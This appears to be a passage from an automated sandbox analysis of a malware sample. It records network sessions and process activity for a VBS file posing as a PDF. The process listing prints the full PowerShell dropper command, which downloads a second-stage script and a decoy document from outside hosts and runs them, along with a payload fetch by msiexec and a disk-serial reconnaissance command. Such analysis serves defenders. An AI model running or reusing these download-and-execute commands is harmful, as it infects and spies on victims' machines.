                                                                                                                                                2024-12-18 18:26:23 UTC8000INData Raw: 2b 5a 6d 6a 76 39 4d 31 4a 77 35 55 49 2f 38 79 33 65 7a 4f 67 4b 33 41 68 77 66 55 4d 48 2f 67 38 78 7a 35 49 45 74 6f 2f 57 4e 51 78 2f 36 30 33 61 46 6f 56 61 34 57 6f 55 50 4f 65 39 6f 31 66 4b 57 46 4c 67 70 37 5a 55 4e 62 63 44 66 32 6d 70 55 6d 72 41 6a 39 52 54 2b 4a 49 63 55 74 37 67 63 37 4d 4d 44 61 68 54 4f 72 41 72 4c 31 32 74 7a 48 4f 38 34 39 51 69 4a 34 4a 57 46 68 70 71 48 44 61 78 57 53 56 55 52 32 41 2b 61 6b 2b 2b 4d 73 56 39 74 64 4a 37 57 48 4f 32 48 4d 77 45 32 7a 7a 58 34 74 4e 33 79 74 50 2b 58 44 54 6d 61 59 6c 79 41 49 58 42 79 6b 47 35 6b 69 57 73 34 55 49 7a 49 68 63 43 49 6c 32 35 55 37 53 63 39 71 46 36 6c 5a 6e 59 45 4d 6e 4b 74 78 45 50 38 6a 39 41 31 6c 79 46 4a 51 6c 53 4a 61 6c 51 4d 4c 44 51 63 33 46 78 76 66 6e 63 51
                                                                                                                                                Data Ascii: +Zmjv9M1Jw5UI/8y3ezOgK3AhwfUMH/g8xz5IEto/WNQx/603aFoVa4WoUPOe9o1fKWFLgp7ZUNbcDf2mpUmrAj9RT+JIcUt7gc7MMDahTOrArL12tzHO849QiJ4JWFhpqHDaxWSVUR2A+ak++MsV9tdJ7WHO2HMwE2zzX4tN3ytP+XDTmaYlyAIXBykG5kiWs4UIzIhcCIl25U7Sc9qF6lZnYEMnKtxEP8j9A1lyFJQlSJalQMLDQc3FxvfncQ
                                                                                                                                                2024-12-18 18:26:23 UTC8000INData Raw: 71 55 35 48 72 41 44 37 5a 55 4e 30 66 78 47 44 7a 6d 46 6c 56 79 41 63 38 68 4e 64 57 35 55 2f 7a 69 51 66 6f 7a 34 34 42 41 4c 7a 47 35 38 43 64 63 72 75 59 51 6f 32 4d 65 39 49 4c 46 50 4a 62 57 65 4b 2f 32 37 65 64 68 6e 64 58 33 41 32 58 67 4a 42 74 66 42 74 6e 32 65 33 75 79 56 77 54 54 62 69 51 6a 6c 67 41 38 6e 78 2b 47 6a 67 72 58 2f 6a 4b 72 39 4e 38 51 69 6f 53 52 30 41 56 70 6a 65 74 31 38 59 4e 42 6c 4e 75 35 63 77 54 6e 76 6c 51 30 35 37 35 55 4e 4f 65 2b 56 44 54 6e 76 6c 57 5a 4e 4a 55 35 68 45 7a 57 4f 53 52 31 56 59 59 6e 48 70 35 4b 75 39 62 49 54 4e 56 51 72 57 78 76 6c 7a 6f 52 4d 62 62 62 64 31 41 6a 61 5a 32 35 48 78 6d 37 58 69 67 4e 51 65 4d 62 69 72 38 62 42 35 71 77 38 49 4c 4f 61 4e 58 4a 4e 4d 38 32 36 6b 75 6b 4e 4e 6d 75 4b
                                                                                                                                                Data Ascii: qU5HrAD7ZUN0fxGDzmFlVyAc8hNdW5U/ziQfoz44BALzG58CdcruYQo2Me9ILFPJbWeK/27edhndX3A2XgJBtfBtn2e3uyVwTTbiQjlgA8nx+GjgrX/jKr9N8QioSR0AVpjet18YNBlNu5cwTnvlQ0575UNOe+VDTnvlWZNJU5hEzWOSR1VYYnHp5Ku9bITNVQrWxvlzoRMbbbd1AjaZ25Hxm7XigNQeMbir8bB5qw8ILOaNXJNM826kukNNmuK
                                                                                                                                                2024-12-18 18:26:23 UTC8000INData Raw: 55 58 36 6c 51 70 38 7a 70 72 69 78 57 41 58 69 59 6b 51 39 6d 57 6c 44 2b 68 74 2f 39 4d 7a 72 6e 48 69 56 49 51 4d 6e 4a 57 37 79 57 4e 48 51 45 2b 55 6e 70 33 48 59 52 6a 48 64 62 42 33 4e 63 36 77 38 7a 54 70 74 57 70 34 58 62 67 71 44 51 38 78 6e 34 7a 4f 4f 34 4a 33 6c 47 35 53 52 4c 65 7a 7a 59 51 6d 5a 46 75 61 5a 6c 61 50 46 51 75 6a 76 59 79 6b 48 38 56 34 2b 4b 6e 2b 69 41 70 56 4c 6e 57 6f 52 70 30 5a 63 53 44 62 71 4f 68 30 32 6c 4b 77 59 67 6f 4d 4f 65 38 73 4c 4c 2f 4d 6a 63 46 59 70 65 32 68 69 6d 4a 2b 35 42 62 31 70 58 58 6f 79 37 54 39 2f 48 50 39 79 7a 50 4f 6e 51 37 73 30 48 73 46 31 69 6e 30 63 41 44 72 66 55 59 43 79 52 54 38 59 36 51 71 72 4c 67 65 68 4e 7a 75 55 63 4f 7a 76 6a 42 33 4e 62 67 42 70 68 36 6d 77 42 54 4c 69 79 33 4e
                                                                                                                                                Data Ascii: UX6lQp8zprixWAXiYkQ9mWlD+ht/9MzrnHiVIQMnJW7yWNHQE+Unp3HYRjHdbB3Nc6w8zTptWp4XbgqDQ8xn4zOO4J3lG5SRLezzYQmZFuaZlaPFQujvYykH8V4+Kn+iApVLnWoRp0ZcSDbqOh02lKwYgoMOe8sLL/MjcFYpe2himJ+5Bb1pXXoy7T9/HP9yzPOnQ7s0HsF1in0cADrfUYCyRT8Y6QqrLgehNzuUcOzvjB3NbgBph6mwBTLiy3N


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                2192.168.2.44973993.95.216.1754436904C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-12-18 18:26:37 UTC212OUTGET /lm/List%20of%20required%20items%20and%20services.docx HTTP/1.1
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                Host: www.fornid.com
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                2024-12-18 18:26:38 UTC354INHTTP/1.1 200 OK
                                                                                                                                                Date: Wed, 18 Dec 2024 18:26:38 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                Connection: Upgrade, close
                                                                                                                                                Last-Modified: Fri, 13 Dec 2024 18:09:56 GMT
                                                                                                                                                ETag: "204006c-343d-6292abcfbf60e"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 13373
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Content-Type: application/vnd.openxmlformats-officedocument.wordprocessingml.document
                                                                                                                                                2024-12-18 18:26:38 UTC7838INData Raw: 50 4b 03 04 14 00 06 00 08 00 00 00 21 00 df a4 d2 6c 5a 01 00 00 20 05 00 00 13 00 08 02 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 04 02 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                Data Ascii: PK!lZ [Content_Types].xml (
                                                                                                                                                2024-12-18 18:26:38 UTC5535INData Raw: d9 51 78 33 c5 f1 a4 bf b1 8e e8 86 f1 74 b7 f1 66 26 d1 b0 3c ea 69 09 db 3c de 6d b9 99 25 37 2c 4f 7a 5a c2 36 4f 7b 5a 6a 9d 36 2c bb f4 f0 96 65 f7 ad 81 70 d2 15 3f 55 8d e7 08 be 93 ae 28 aa 8c 5b 9b ed 0a a4 ca b2 2d 04 4f ba a2 a8 21 95 e0 22 0c d5 d9 02 c8 4e 3f cd b8 ed fb 89 c7 6d 8f 51 91 1b 05 23 27 37 4a 6f 5d b9 21 ba 04 f6 85 7f 8b d5 91 1d 93 34 75 7b d5 d5 13 20 ef eb 49 74 af cc f9 db 5a 98 75 fb c6 09 a7 fe 37 75 7d 90 13 a7 34 e7 41 2b ce a4 ff 89 ab 46 96 71 fb b1 77 ba 71 43 f4 ce 3b 6e 88 de 09 c8 0d d1 2b 13 39 cd 51 29 c9 8d d2 3b 37 b9 21 7a 27 29 37 04 3a 5b c1 23 02 2e 5b 41 7b 5c b6 82 f6 3e d9 0a a2 f8 64 ab 01 b3 00 37 44 ef e9 80 1b 02 2d 54 08 81 16 ea 80 99 82 1b 02 25 54 60 ee 25 54 88 82 16 2a 84 40 0b 15 42 a0 85 0a
                                                                                                                                                Data Ascii: Qx3tf&<i<m%7,OzZ6O{Zj6,ep?U([-O!"N?mQ#'7Jo]!4u{ ItZu7u}4A+FqwqC;n+9Q);7!z')7:[#.[A{\>d7D-T%T`%T*@B


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                3192.168.2.449809202.71.109.2284435228C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-12-18 18:27:08 UTC167OUTGET /ef/ef.bin HTTP/1.1
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                Host: www.tdejb.com
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                2024-12-18 18:27:08 UTC223INHTTP/1.1 200 OK
                                                                                                                                                Date: Wed, 18 Dec 2024 18:27:07 GMT
                                                                                                                                                Server: Apache
                                                                                                                                                Last-Modified: Wed, 18 Dec 2024 04:50:01 GMT
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Content-Length: 449600
                                                                                                                                                Connection: close
                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                2024-12-18 18:27:08 UTC7969INData Raw: d8 ea 63 d0 dc b4 e7 7b a0 48 8d 32 bc aa a8 a1 d9 72 4d 49 ee 58 76 8f 5b 71 ac d4 fc 2c 97 36 74 07 89 0b e4 d7 63 9d 75 eb 2f 56 b6 11 90 9d d7 7a 11 fa 66 b6 6c c5 4b 66 d1 c8 33 46 cb 41 e0 c7 2c 28 cf 28 24 36 89 0a d7 ff c3 4b 4c e2 fd 9b 44 16 3d 05 3e a0 d4 57 3a b7 39 b0 61 c5 01 f3 50 6d 31 01 17 d5 68 bd eb ff 2f e3 59 da e9 bc 36 0d d5 ef d1 81 c9 a0 bd 45 51 17 aa d3 43 57 db 1f bb 5c 76 87 7d 5c fd 3a d9 a1 47 6a e4 f6 ce 84 63 d5 89 30 4c 8c 98 94 19 b1 fb 1f f7 91 22 05 eb 65 86 27 d6 d2 a1 bf 9b 0f 2f ef ec 91 e9 cf a6 a1 70 6b e0 4c 50 4b cf 11 bb 76 ca 1b bb 83 1f 0c 59 0c 67 a1 b9 9d 24 7a f9 c0 a2 86 20 08 f2 84 37 aa 7c d0 95 d9 f3 41 6b c2 41 ba e7 85 17 e4 77 4d 05 00 70 06 1a 73 c7 a3 82 a9 26 70 67 91 73 96 c4 ed 9c 5b 01 f7 e4
                                                                                                                                                Data Ascii: c{H2rMIXv[q,6tcu/VzflKf3FA,(($6KLD=>W:9aPm1h/Y6EQCW\v}\:Gjc0L"e'/pkLPKvYg$z 7|AkAwMps&pgs[
                                                                                                                                                2024-12-18 18:27:09 UTC8000INData Raw: 4f 1d 77 20 2e 60 83 48 87 3f 9a b3 56 4e 53 85 23 a7 56 07 6d d0 ba 28 e9 84 e9 20 b8 29 a5 06 ec 02 55 79 4a f6 04 e2 94 1e e5 bf 90 09 9b 81 10 59 78 a7 5f dc 4e 43 f6 a9 6a fd de b7 dd 23 90 1c 64 c4 a7 b1 31 6f 22 6b 60 32 3e 12 f8 1b fe 76 99 e3 7c d5 f3 dd 91 63 c2 0c ef 1b bd 9e 2f d5 be 6e da b3 49 05 67 9e c4 23 da 45 18 5f 98 7a d4 2d 22 10 2e 8e 0b bc c1 03 9f 89 b0 f3 87 a6 98 6d c0 fc 21 52 67 04 8d e4 b5 94 ec dd 4d c7 a7 3f 4e 4e a3 c8 d9 36 7e 27 3c ab 8e 0f 64 3b d0 66 eb 5b 1d f0 6a 72 5d 2f 54 01 f5 ef cd d1 dc 44 b2 8c 44 db 2c 1b 23 ac ae 2a 49 c4 97 fb 88 0b e6 53 ba 59 ec fb d9 27 06 05 83 db 18 73 e3 59 5b 49 9d 21 90 ea b4 4a be 92 ae 04 32 63 04 98 2e 88 bd 67 06 0b d3 ee b0 98 b9 2f 5d 3b 1a a3 70 ea f1 85 1d 0f 09 b9 8b 98 e5
                                                                                                                                                Data Ascii: Ow .`H?VNS#Vm( )UyJYx_NCj#d1o"k`2>v|c/nIg#E_z-".m!RgM?NN6~'<d;f[jr]/TDD,#*ISY'sY[I!J2c.g/];p
                                                                                                                                                2024-12-18 18:27:09 UTC8000INData Raw: 89 d6 78 9e f0 8e 59 6b fd ff b0 a0 41 10 40 14 59 e4 c6 49 f7 ab 0e 69 95 84 9e cf f7 bb 33 0c d0 2c 1b 8d fb 0e 06 c4 00 58 2e 6d 27 cc a9 ae 09 be 22 ca 45 1e 67 99 be 69 97 1c 1d 4a 21 12 99 04 c1 a6 ce 3a 79 5b b4 aa dc 82 ad c8 ac 3e 85 e2 41 93 33 2e fc ea 06 97 b7 88 90 28 8c 3f c1 26 a6 05 57 3a 42 c8 24 d1 f0 76 26 5d 00 d5 ad be 15 50 5b 9b 73 44 60 d3 b3 e1 33 1b 82 40 0c 25 e3 c6 df 8e 14 c1 61 3c 19 da 3d 02 bd 0f 80 52 a2 b4 ff 71 af ef 3a 48 d8 c3 55 44 12 3a 6d 15 7b da 9a c9 91 a1 9b af 48 b8 9c 86 93 38 ca c5 8c e7 a3 07 c1 39 3e bf 7d 7b 2e 96 fc c6 dc a1 5b 78 1a 1d a8 b1 92 de 3c 1c 51 b9 85 1e 7d b8 a4 96 2f 49 25 d6 e3 ad 8d 68 ac e4 ba be 0e 46 aa eb 90 d4 8d ae 55 cf d5 ef 50 94 f6 24 03 31 5f 68 c9 22 e3 bb 56 c4 f3 b8 f4 c9 75
                                                                                                                                                Data Ascii: xYkA@YIi3,X.m'"EgiJ!:y[>A3.(?&W:B$v&]P[sD`3@%a<=Rq:HUD:m{H89>}{.[x<Q}/I%hFUP$1_h"Vu
                                                                                                                                                2024-12-18 18:27:09 UTC8000INData Raw: 93 ce 55 b2 28 b7 8a f3 a2 e5 66 6f 63 44 0d 4a b4 45 a9 e9 48 7d 4c 43 ec 5b 23 9a 88 96 b2 9f e9 d5 54 a9 cd ec 36 fc 82 ff d9 d6 2a 3d 1a 48 4e 00 9d 88 65 fb 70 ff fb 50 05 20 22 72 24 b3 02 52 df f0 b7 86 97 54 85 f4 a1 6d 7a c0 70 61 59 5a ee e1 8b 3a 16 eb 10 f1 c0 d8 55 98 76 e1 50 c0 97 d7 71 50 56 59 db 13 2f cf 5e 79 9a ae b1 7a aa e0 e0 ae 3b 5d 21 e1 9a 58 f5 91 88 6b f0 89 73 bf 4a 8e 8b 59 af c2 9e 4c ee 90 21 c6 1e fb ae 62 ee c8 1c b1 f3 51 cb 6c a3 d3 ba e2 ee ba d9 6d 1b a7 09 25 80 56 10 52 eb f6 81 b6 5f 95 69 e5 88 48 7c 18 a2 c9 41 f1 f4 15 48 12 04 ff 5e 3a 3c e7 b8 9b d4 19 77 3d 34 d7 49 57 a0 48 8c 6a 01 e1 12 a6 64 60 13 a1 7b dc 71 83 5c e3 ac a1 6e 52 ab 71 d4 57 28 cc 44 11 30 ce 04 ec c9 a1 a5 d2 a6 c9 e3 71 a2 81 d5 de a3
                                                                                                                                                Data Ascii: U(focDJEH}LC[#T6*=HNepP "r$RTmzpaYZ:UvPqPVY/^yz;]!XksJYL!bQlm%VR_iH|AH^:<w=4IWHjd`{q\nRqW(D0q
                                                                                                                                                2024-12-18 18:27:09 UTC8000INData Raw: 41 2a c5 59 df ad 23 7f 43 da 19 30 46 cb 5c 61 80 7e 70 3d c9 cf c4 5b 04 36 e7 f7 f2 94 0d e5 fc 61 41 fa 8a 6b 87 fe a8 c4 50 3f 4c 0b f8 72 33 d8 20 bf 99 14 15 03 f0 39 8c 92 6f ed 03 89 da 74 33 58 aa 66 c1 91 51 dc e8 e1 09 27 d6 16 85 c1 05 08 56 27 d2 db 57 eb ff ad 39 4b 12 3d 44 02 70 f7 db c0 1f 54 6d b7 68 ed a3 74 a0 f1 df eb 7d 6d 22 f0 24 31 22 fe b4 5b 2a 3e 9c b6 23 31 56 da 3b 20 b9 70 dc 06 38 26 4d b3 be 5e a1 18 aa 8b d9 e5 19 32 33 96 9e 87 37 32 45 2f 00 41 de de f6 0d cb 9d e4 ff a1 a8 eb e4 43 37 43 2c aa ad a7 11 a3 fb 49 4d 66 10 88 35 03 65 ce c7 09 a3 f4 84 8a 2c e9 a2 f1 78 5c 3a de 18 9c 94 64 81 d4 4e e9 03 20 c2 b8 0f 4e ba b0 ea 58 23 ac 92 fd e5 ab 18 2c 31 79 04 27 df ab 60 e2 0d d8 d1 be 53 88 c4 e0 24 fc 5a 8b e1 24
                                                                                                                                                Data Ascii: A*Y#C0F\a~p=[6aAkP?Lr3 9ot3XfQ'V'W9K=DpTmht}m"$1"[*>#1V; p8&M^2372E/AC7C,IMf5e,x\:dN NX#,1y'`S$Z$
                                                                                                                                                2024-12-18 18:27:09 UTC8000INData Raw: f1 86 cc 7f 98 46 c7 60 5e d7 ad da dd 5a 19 bd fa 06 12 99 92 81 74 7e 61 af b5 d3 c6 d3 07 90 b4 d9 12 8d 05 e4 ff 6f b6 eb 06 d0 b0 6e 9c 68 88 ab fd 7d 0c 07 1a 3b 27 df b0 cf 93 ee 30 4c 9a 1d 11 a7 27 d5 ce 24 76 99 fb 34 d7 1c 36 c4 84 78 54 80 21 98 50 65 db 68 87 02 56 b7 85 3e e4 b9 7d 5f 81 7c e9 7e 33 b8 63 67 02 00 d2 96 39 b4 c8 eb 3c e7 f8 ad d2 56 67 bc f1 6c 1f 4e bf 5a f0 91 b4 5e f6 0d ab fa a7 5d 74 3a 5f 63 8a 1d e3 1a 7a 2b 1b fa 96 e5 27 6c 5c cf 97 1c ef bf be 34 ef 71 2c 7d 37 68 bf a3 5f aa ea 5c c6 62 0f 64 de 85 0a c0 0f eb 3c 95 5c 03 b0 96 b3 c2 1e d2 f3 ff 25 41 31 bc 66 41 a4 b7 2b 3e ee ff 7d c0 4a 05 42 1f 5c d8 6b 3c 48 f2 66 5b aa dd 7c dc e7 99 f8 f2 24 4d 0f 3f ff 4b 45 ef c5 e0 65 f4 cc e9 22 9f ab 56 8a cb 62 61 40
                                                                                                                                                Data Ascii: F`^Zt~aonh};'0L'$v46xT!PehV>}_|~3cg9<VglNZ^]t:_cz+'l\4q,}7h_\bd<\%A1fA+>}JB\k<Hf[|$M?KEe"Vba@
                                                                                                                                                2024-12-18 18:27:09 UTC8000INData Raw: 8f 44 9b c7 f7 ed a0 17 5b 44 6d f6 a0 6c a8 ed 12 e6 4a 89 f2 c0 81 38 45 7a 64 25 21 bb d8 a5 b5 48 b1 c6 25 91 b0 a2 e8 71 77 3b 5c 58 cc f3 8c a7 ea 13 e7 f2 dd 02 28 c4 76 2d bb 17 d5 c9 be ee c2 10 d2 3a a8 aa a2 56 4a fb 6d 93 90 aa 44 01 fc ff dc 2d 4d 2d 34 63 60 e0 ca 85 1f b0 e2 ec d6 6b 2b 2d e4 25 1b 80 8f 86 cf c3 b0 18 fb 3f 44 e8 d9 35 ec 75 86 0c d0 49 49 72 2b a2 0f 49 20 12 8c d1 a6 e0 f8 9f 35 60 73 f7 f8 7e 84 e7 7f 78 65 bf 09 d2 62 39 11 4d c5 3e e8 7c 68 6d 66 48 bd 91 8e 61 bb e1 c3 20 79 8f 6a 9d 59 11 95 60 c7 8a bc af 47 3a 8f ad f5 64 c3 01 bd 96 0d 4e 11 e6 87 c5 92 45 2d 46 84 eb c7 98 ba 94 c7 c2 79 98 e6 5f 75 9d e8 7e af 40 b8 33 44 34 79 1a a3 d6 91 5a 0a 6a f0 15 1b f5 40 a4 b3 59 2f 00 b2 e8 d4 10 ea cb 19 e4 1e ca 1a
                                                                                                                                                Data Ascii: D[DmlJ8Ezd%!H%qw;\X(v-:VJmD-M-4c`k+-%?D5uIIr+I 5`s~xeb9M>|hmfHa yjY`G:dNE-Fy_u~@3D4yZj@Y/
                                                                                                                                                2024-12-18 18:27:09 UTC8000INData Raw: 01 5d 41 1b bd 0f cf d4 13 f7 12 3d 78 27 b3 ca ec 0f 96 dc 65 18 8a fb 4d 75 cd 0e fe 68 02 50 9f b0 09 08 7c 9c 6c ef cd 05 21 4d d6 0b 06 fe ec 73 4d 00 c6 01 f4 17 ec 04 ee 67 95 e6 da 81 57 b1 b0 c4 d1 34 51 39 92 90 1e d4 b9 bc 3b 38 2e 8f 3c d3 56 bd e7 0c 05 28 d0 95 80 38 f0 44 90 17 7a 14 4c 3c ed 70 fd e9 ae 4b 8c 23 fd 9c 64 1e 9f 03 5c 84 3e 33 10 37 da 26 b4 e0 69 f6 a8 18 94 10 c6 8a 68 61 1a 16 23 8e f7 48 c7 d2 1c 41 ad ce 51 39 8c 89 19 74 5e 60 15 4d 80 8c ce 48 52 dc e3 c2 f0 f8 46 72 ac 28 1d 14 08 b5 7c c2 dd 2e 61 2a 8b 02 b4 3c 12 82 6e d6 65 3d 2c 7b fa ea 52 7a c7 6a 8b 4f 79 50 8f c7 50 2f 65 0d 32 2a 67 fe e3 59 2e 29 57 78 59 f9 34 a5 97 4f c1 ef c5 73 60 07 c9 62 9e 9a 18 b0 4b 6f 85 48 a2 7f 1b 6d 6a 80 fb 95 84 da d0 9f b8
                                                                                                                                                Data Ascii: ]A=x'eMuhP|l!MsMgW4Q9;8.<V(8DzL<pK#d\>37&iha#HAQ9t^`MHRFr(|.a*<ne=,{RzjOyPP/e2*gY.)WxY4Os`bKoHmj
                                                                                                                                                2024-12-18 18:27:09 UTC8000INData Raw: 3b 0b e5 1d 5e cc cc b4 15 b0 77 18 eb d8 d5 d4 e2 ee c3 ef dd ee bd 67 9f 2b 05 23 0c 86 a5 6f 7a 24 79 be 4e ff 04 a9 a8 9a 63 8b 25 1b 4e 14 f2 cd 83 0c 30 14 ef 1c fd f2 c1 39 48 36 2b 67 79 a5 59 60 22 90 60 b7 a2 1c 15 5f 82 b7 d5 9a 22 b8 b8 22 10 01 17 77 ee 59 88 c0 6d cf 5f 45 f7 ec 7a 99 c9 1d 4a 32 ea d3 8b cd 21 7d b4 8c 63 77 e1 3a 3f 1d 00 cb 82 a6 d2 20 f5 24 cb f3 7d b9 ec 74 5a 11 f8 86 db 36 82 ad 9f d6 cd 77 6f 5f d5 53 0a 0f b5 14 20 5a 67 41 f1 40 3b a3 8c 64 56 4c 9f 06 b3 d4 49 39 4e d8 e1 31 c4 07 3e 60 49 ae e9 b1 b4 ee cf 93 3a 21 54 0a c9 d8 ae 8b 64 aa cc 9a 20 ed 9e d0 cb 99 2d ba ab 56 75 95 0a d6 97 74 19 11 6f 64 30 17 1a 30 3f 8b 38 89 b3 93 79 f5 8e c4 36 9f ff b0 14 5d aa e4 14 17 fc 5b a5 f7 21 94 db 98 84 f7 15 e1 8d
                                                                                                                                                Data Ascii: ;^wg+#oz$yNc%N09H6+gyY`"`_""wYm_EzJ2!}cw:? $}tZ6wo_S ZgA@;dVLI9N1>`I:!Td -Vutod00?8y6][!
                                                                                                                                                2024-12-18 18:27:09 UTC8000INData Raw: da 0e 84 ed f0 b7 d4 11 77 d9 fc 1a 73 b1 e7 4a 52 7d 19 bb f8 01 15 2f b0 ec fe 2c 3b 11 51 28 8c 94 38 0e ef 11 f7 b1 c3 fc 6b c7 36 48 01 20 a7 31 9b 5c bd 2f 96 20 80 8b 4a 64 82 f3 0f c5 ba 96 cb 52 91 1b e3 01 8d ba 19 60 11 b1 ed 0e 1c 7e c0 ca 23 96 82 72 65 e8 b7 48 72 f9 bd 17 13 85 95 05 fc 1c 1b dc bd 04 19 41 70 8c 69 68 6f a2 c6 71 e8 1a 14 9b 21 6d 57 fc 36 d0 6f ad aa 39 50 5f c7 7b 72 03 a8 ca cc bf 77 bb 24 3c 86 6a 69 55 cf 6a 7e 83 c9 6a d8 b9 06 33 7c 9a ae 22 43 b2 e8 28 96 7a 3a 87 12 cf 9d 22 c8 ca 3f 80 45 e1 e2 38 80 ee 04 b6 f2 33 6a 41 02 14 d6 08 a8 ce f1 24 c0 4f 55 64 d4 57 45 f2 00 4e d8 c5 b8 ed ab 77 0b 6a b7 1d 89 10 88 08 64 1d b9 93 16 42 91 1b b7 6e b0 53 18 66 79 6c 94 e8 4a c9 1e 05 f7 48 aa 25 60 61 5b 67 f6 a5 90
                                                                                                                                                Data Ascii: wsJR}/,;Q(8k6H 1\/ JdR`~#reHrApihoq!mW6o9P_{rw$<jiUj~j3|"C(z:"?E83jA$OUdWENwjdBnSfylJH%`a[g


                                                                                                                                                Statistics

                                                                                                                                                CPU Usage

                                                                                                                                                Click to jump to process

                                                                                                                                                Memory Usage

                                                                                                                                                Click to jump to process

                                                                                                                                                High Level Behavior Distribution

                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                Behavior

                                                                                                                                                Click to jump to process

                                                                                                                                                System Behavior

                                                                                                                                                General

                                                                                                                                                Target ID:0
                                                                                                                                                Start time:13:26:05
                                                                                                                                                Start date:18/12/2024
                                                                                                                                                Path:C:\Windows\System32\wscript.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\List of required items and services.pdf.vbs"
                                                                                                                                                Imagebase:0x7ff615340000
                                                                                                                                                File size:170'496 bytes
                                                                                                                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:1
                                                                                                                                                Start time:13:26:05
                                                                                                                                                Start date:18/12/2024
                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/ef/ef.vbs' -destination 'C:\Users\Public\g8ix97hz.vbs';DownloadAndRun -url 'https://www.fornid.com/lm/List%20of%20required%20items%20and%20services.docx' -destination 'C:\Users\Public\rdc7di6ccs.docx'
                                                                                                                                                Imagebase:0x7ff788560000
                                                                                                                                                File size:452'608 bytes
                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:false

                                                                                                                                                General

                                                                                                                                                Target ID:2
                                                                                                                                                Start time:13:26:05
                                                                                                                                                Start date:18/12/2024
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                File size:862'208 bytes
                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:false

                                                                                                                                                General

                                                                                                                                                Target ID:3
                                                                                                                                                Start time:13:26:11
                                                                                                                                                Start date:18/12/2024
                                                                                                                                                Path:C:\Windows\System32\wscript.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\Public\g8ix97hz.vbs"
                                                                                                                                                Imagebase:0x7ff615340000
                                                                                                                                                File size:170'496 bytes
                                                                                                                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:4
                                                                                                                                                Start time:13:26:14
                                                                                                                                                Start date:18/12/2024
                                                                                                                                                Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:wmic diskdrive get caption,serialnumber
                                                                                                                                                Imagebase:0x7ff6f09b0000
                                                                                                                                                File size:576'000 bytes
                                                                                                                                                MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                Has elevated privileges:false
                                                                                                                                                Has administrator privileges:false
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high
                                                                                                                                                Has exited:true

                                                                                                                                                General

                                                                                                                                                Target ID:5
                                                                                                                                                Start time:13:26:14
                                                                                                                                                Start date:18/12/2024
                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                Wow64 process (32bit):false
